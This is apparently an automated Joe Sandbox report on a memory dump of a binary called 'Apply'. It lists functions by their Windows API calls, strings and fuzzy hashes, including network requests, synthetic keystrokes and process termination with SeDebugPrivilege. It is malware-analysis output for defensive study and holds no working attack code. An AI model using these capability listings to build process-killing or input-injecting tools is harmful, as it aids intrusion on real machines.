Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3a33578a732821ce2b8ae3a2c674bb7297c9ddfb3ded8f84ed5707cca561179e
Instruction ID: 4160b249f61ea0f50d706813f3f445db1764ba9bd478908d0fdffb529e1ed9a8
Opcode Fuzzy Hash: 3a33578a732821ce2b8ae3a2c674bb7297c9ddfb3ded8f84ed5707cca561179e
Instruction Fuzzy Hash: D3318171510308AFEB309F64DC88FA97BA9FB51351F104015FB19DB3A0E7B49D85AB60

Function 00882FD0 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00882FE4

Part of subcall function 00882D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4), ref: 00882D2E
Part of subcall function 00882D18: GetLastError.KERNEL32(00921DB4,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4,00921DB4), ref: 00882D40

_free.LIBCMT ref: 00882FF0
_free.LIBCMT ref: 00882FFB
_free.LIBCMT ref: 00883006
_free.LIBCMT ref: 00883011
_free.LIBCMT ref: 0088301C
_free.LIBCMT ref: 00883027
_free.LIBCMT ref: 00883032
_free.LIBCMT ref: 0088303D
_free.LIBCMT ref: 0088304B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0f8a58ebee2ba17233c84a6a5416b8bc504a842c723e7e41502b958c92bffed0
Instruction ID: 2461962d8e96dab79c49818d63837ce1209200db37e876a3171b5c735c0e8e7f
Opcode Fuzzy Hash: 0f8a58ebee2ba17233c84a6a5416b8bc504a842c723e7e41502b958c92bffed0
Instruction Fuzzy Hash: 8711447651010CAFDB41FF98C942CDD7FA5FF05350B6181A5BA08DF622DA31EE509B91

Function 0085433C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00854385
OleUninitialize.OLE32(?,00000000), ref: 00854424
UnregisterHotKey.USER32(?), ref: 00854609
DestroyWindow.USER32(?), ref: 00893D80
FreeLibrary.KERNEL32(?), ref: 00893DE5
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00893E12

Strings

close all, xrefs: 00854380

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 07890ec945674adf932e61f68ce9eabdb8400a1de24ee60bb92e4fe5874585ae
Instruction ID: 11aa218b5f4f057c0951b61540e6edcfe047024ee772c1b15d88161b9d9a5e9e
Opcode Fuzzy Hash: 07890ec945674adf932e61f68ce9eabdb8400a1de24ee60bb92e4fe5874585ae
Instruction Fuzzy Hash: 84D15871601212CFCB29EF18C895A69F7A0FF04719F1542ADE94AEB261CB31ED5ACF41

Function 008C855F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C871C
SetCurrentDirectoryW.KERNEL32(?), ref: 008C8730
GetFileAttributesW.KERNEL32(?), ref: 008C875A
SetFileAttributesW.KERNEL32(?,00000000), ref: 008C8774
SetCurrentDirectoryW.KERNEL32(?), ref: 008C8786
SetCurrentDirectoryW.KERNEL32(?), ref: 008C87CF
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008C881F

Strings

*.*, xrefs: 008C87D5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: c912ff903cad6483dc74eed0b2f050a636ee87d6ee3b3c25bd61d948b619a1fe
Instruction ID: 56b5d7acf7afb1f4a675b551ae4d40387ac1a013033817ad4b918057f287e873
Opcode Fuzzy Hash: c912ff903cad6483dc74eed0b2f050a636ee87d6ee3b3c25bd61d948b619a1fe
Instruction Fuzzy Hash: 68817D71544344DFCB20EF18C498EAAB3F9FB95314F14882EF885D7250EB74E9498B92

Function 008562A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00856337

Part of subcall function 008563C7: GetClientRect.USER32(?,?), ref: 008563ED
Part of subcall function 008563C7: GetWindowRect.USER32(?,?), ref: 0085642E
Part of subcall function 008563C7: ScreenToClient.USER32(?,?), ref: 00856456

GetDC.USER32 ref: 0089509B
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008950AE
SelectObject.GDI32(00000000,00000000), ref: 008950BC
SelectObject.GDI32(00000000,00000000), ref: 008950D1
ReleaseDC.USER32(?,00000000), ref: 008950D9
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0089516A

Strings

U, xrefs: 00895039

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: df5a5730948eccdb63bf9b576ddd5e21feebe826f8d383a093a63d2e4aac9067
Instruction ID: bf9a5131b25e3bef8bffd2755db850991fb5f84a5f6ee4138ff11ac2530f504a
Opcode Fuzzy Hash: df5a5730948eccdb63bf9b576ddd5e21feebe826f8d383a093a63d2e4aac9067
Instruction Fuzzy Hash: 1271FC30500609EFCF26AF68CC84AAA7BB1FF49324F184269ED55DB2A6D3318C95DB50

Function 008E91EE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

Part of subcall function 0085135A: GetCursorPos.USER32(?), ref: 0085136E
Part of subcall function 0085135A: ScreenToClient.USER32(00000000,?), ref: 0085138B
Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000001), ref: 008513C2
Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000002), ref: 008513DC

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 008E9257
ImageList_EndDrag.COMCTL32 ref: 008E925D
ReleaseCapture.USER32 ref: 008E9263
SetWindowTextW.USER32(?,00000000), ref: 008E92FE
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008E9311
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 008E93EB

Strings

@GUI_DROPID, xrefs: 008E933D
@GUI_DRAGFILE, xrefs: 008E9386

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 9db5aa85ed40aa1739f35cb89da7d36547f0666b36321321b21a5b29c2564a5c
Instruction ID: 7e18eac9a8636e5a0bac9e0514e04a1fa6f9e9be87211067d42749f6be83f0db
Opcode Fuzzy Hash: 9db5aa85ed40aa1739f35cb89da7d36547f0666b36321321b21a5b29c2564a5c
Instruction Fuzzy Hash: 9051BC74104344AFDB14EF18DC9AFAA77E4FB88715F00061DF9929B2E1DBB09949CB92

Function 008CC9C2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CC9E1
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008CCA09
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008CCA39
GetLastError.KERNEL32 ref: 008CCA91
SetEvent.KERNEL32(?), ref: 008CCAA5
InternetCloseHandle.WININET(00000000), ref: 008CCAB0

Strings

, xrefs: 008CCA2A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 83c8548870219ab0a7c01fb7f0f921cd73886dd577117ba522b45eac62058947
Instruction ID: cd78a62978d81ac0c863727e2f9051d9544cab4d48fc8332cb2c82ba8a9c5bb1
Opcode Fuzzy Hash: 83c8548870219ab0a7c01fb7f0f921cd73886dd577117ba522b45eac62058947
Instruction Fuzzy Hash: A33158B1600708AFD721DF659C88FAB7BBCFB49784B10851EE44AD6210EB34ED089B61

Function 008B2781 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 008B278D
GetClassNameW.USER32(00000000,?,00000100), ref: 008B27A2
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008B282F

Strings

smallicons, xrefs: 008B27F7
list, xrefs: 008B2811
details, xrefs: 008B27DD
largeicons, xrefs: 008B27C3
SHELLDLL_DefView, xrefs: 008B27AE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 7c364307ed536a7466700ab113ff38835b4a531ed040fe74ddfb506af030a6c2
Instruction ID: fd7e456b250e3a8d4d3b561979ce178dd1523a60a9a94f521ff13229d654a1b3
Opcode Fuzzy Hash: 7c364307ed536a7466700ab113ff38835b4a531ed040fe74ddfb506af030a6c2
Instruction Fuzzy Hash: C311297A78C30FB9FA1126249C06CEA379CFF19738B304136F905E41E1FF65A8504595

Function 0088D1E1 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0088D208
_free.LIBCMT ref: 0088D273
_free.LIBCMT ref: 0088D299
_free.LIBCMT ref: 0088D2C2
_free.LIBCMT ref: 0088D2FA
_free.LIBCMT ref: 0088D32B
_free.LIBCMT ref: 0088D36C
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0088D3ED
_free.LIBCMT ref: 0088D406

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: fbfb7a117cf42adf8264fa799015be9b3681d345184ee7e843b09f6d7fec400a
Instruction ID: e885ab10de4251ce28c0f023ac127ce68622c392d4506fc60bfad37b3adf367c
Opcode Fuzzy Hash: fbfb7a117cf42adf8264fa799015be9b3681d345184ee7e843b09f6d7fec400a
Instruction Fuzzy Hash: F361F671908315AFDF31BF78988166DBBA4FF12720F14416DE944E72C1EB31E9018792

Function 008E5894 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 008E5946
ShowWindow.USER32(?,00000000), ref: 008E5987
ShowWindow.USER32(?,00000005,?,00000000), ref: 008E598D
SetFocus.USER32(?,?,00000005,?,00000000), ref: 008E5991

Part of subcall function 008E7685: DeleteObject.GDI32(00000000), ref: 008E76B1

GetWindowLongW.USER32(?,000000F0), ref: 008E59CD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E59DA
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008E5A0D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 008E5A47
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 008E5A56

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: c412a866aad5ebcfb1ea127d54f4bf5ebc4cdf1fab27c73ec01ada9fbf11f4d2
Instruction ID: 48dae2bbcbe472ae0f02a593cc5536e8ce3597d3594bfa217f9db88a4f5393e4
Opcode Fuzzy Hash: c412a866aad5ebcfb1ea127d54f4bf5ebc4cdf1fab27c73ec01ada9fbf11f4d2
Instruction Fuzzy Hash: 8551A430650A98FEEF30AF6ADC85BD83F65FB06328F144116F515DA2E2C7719A90DB81

Function 00868E2B Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008A6F36
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008A6F4F
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008A6F5F
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008A6F77
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008A6F98
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FA7
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008A6FC4
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FD3

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 7ad64a4ca1bdece41fdea92fd1bd6bb1017225bcd5cdb704e02f24be7b204b17
Instruction ID: d86d814e9f13aeadba82073a6c12bc45468bb8db4971ba5550b6f8c5fc52d62e
Opcode Fuzzy Hash: 7ad64a4ca1bdece41fdea92fd1bd6bb1017225bcd5cdb704e02f24be7b204b17
Instruction Fuzzy Hash: 62516B70600209EFEB20DF24DC85FAA7BB5FB54714F144618F946DB6A0EB72E890DB50

Function 008CC8B2 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008CC8F1
GetLastError.KERNEL32 ref: 008CC904
SetEvent.KERNEL32(?), ref: 008CC918

Part of subcall function 008CC9C2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CC9E1
Part of subcall function 008CC9C2: GetLastError.KERNEL32 ref: 008CCA91
Part of subcall function 008CC9C2: SetEvent.KERNEL32(?), ref: 008CCAA5
Part of subcall function 008CC9C2: InternetCloseHandle.WININET(00000000), ref: 008CCAB0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: cf99f63fe77f48286a6d699d96d9abcfb1c926d8b37796a9ac5b82ebea149dce
Instruction ID: bb5d8c623c0327085ebc36bd82c6e0512f0cc753c2668054626a2dc2a23231a4
Opcode Fuzzy Hash: cf99f63fe77f48286a6d699d96d9abcfb1c926d8b37796a9ac5b82ebea149dce
Instruction Fuzzy Hash: 8E314771200745BFDB219F65CC84F6ABFB9FF48304B14842EF95ACA610D731E818ABA1

Function 008B2C84 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 008B4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B4142
Part of subcall function 008B4128: GetCurrentThreadId.KERNEL32 ref: 008B4149
Part of subcall function 008B4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2C95), ref: 008B4150

MapVirtualKeyW.USER32(00000025,00000000), ref: 008B2C9F
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008B2CBD
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008B2CC1
MapVirtualKeyW.USER32(00000025,00000000), ref: 008B2CCB
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008B2CE3
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 008B2CE7
MapVirtualKeyW.USER32(00000025,00000000), ref: 008B2CF1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008B2D05
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 008B2D09

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5427d26a129fcd9ab65c1898b0d525e7490166bb073bfc6f8c700ec6ce415b99
Instruction ID: 3baa17e54c3664867d6b7f9cc4693dd3b8e6e102356ec17eae6fddd8b1343e66
Opcode Fuzzy Hash: 5427d26a129fcd9ab65c1898b0d525e7490166bb073bfc6f8c700ec6ce415b99
Instruction Fuzzy Hash: CC01D8307803147BFB2067689CCAF997F59FB5AB52F100001F718EE1E0C9E254488A6A

Function 008DA869 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 008BDAC1: CreateToolhelp32Snapshot.KERNEL32 ref: 008BDAE6
Part of subcall function 008BDAC1: Process32FirstW.KERNEL32(00000000,?), ref: 008BDAF4
Part of subcall function 008BDAC1: FindCloseChangeNotification.KERNEL32(00000000), ref: 008BDBC1

OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DA8F4
GetLastError.KERNEL32 ref: 008DA907
OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DA93A
TerminateProcess.KERNEL32(00000000,00000000), ref: 008DA9EF
GetLastError.KERNEL32(00000000), ref: 008DA9FA
CloseHandle.KERNEL32(00000000), ref: 008DAA4B

Strings

SeDebugPrivilege, xrefs: 008DA916

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 22839a2e0bc12708bef1cfa95f64469d9da69aade0bf5e28086ba637541c96bb
Instruction ID: c8a688517a1c2113e2b4e3c7c1385e07f33932df01d5134da0b3f1f57c200e2d
Opcode Fuzzy Hash: 22839a2e0bc12708bef1cfa95f64469d9da69aade0bf5e28086ba637541c96bb
Instruction Fuzzy Hash: FE619D31204341AFD724DF18C494F16BBA0FF44318F28859DE8668B792D775ED8ACB92

Function 008E4044 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008E40E3
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008E40F8
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008E4112
_wcslen.LIBCMT ref: 008E4157
SendMessageW.USER32(?,00001057,00000000,?), ref: 008E4184
SendMessageW.USER32(?,00001061,?,0000000F), ref: 008E41B2

Strings

SysListView32, xrefs: 008E40B5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: b2579a3f453e552b7ee6234643a33b551c83d2ab0a35ff7a8347753b37c6320a
Instruction ID: 11fd8b778e06420b9d3f854ae16216cf03d41dade8ed0742ebaa6bc8457c03dc
Opcode Fuzzy Hash: b2579a3f453e552b7ee6234643a33b551c83d2ab0a35ff7a8347753b37c6320a
Instruction Fuzzy Hash: 6941D071A00358ABDF219FA4CC89BEA7BA9FF58350F101526F918EB281D771D994CB90

Function 008BC35F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC3FE
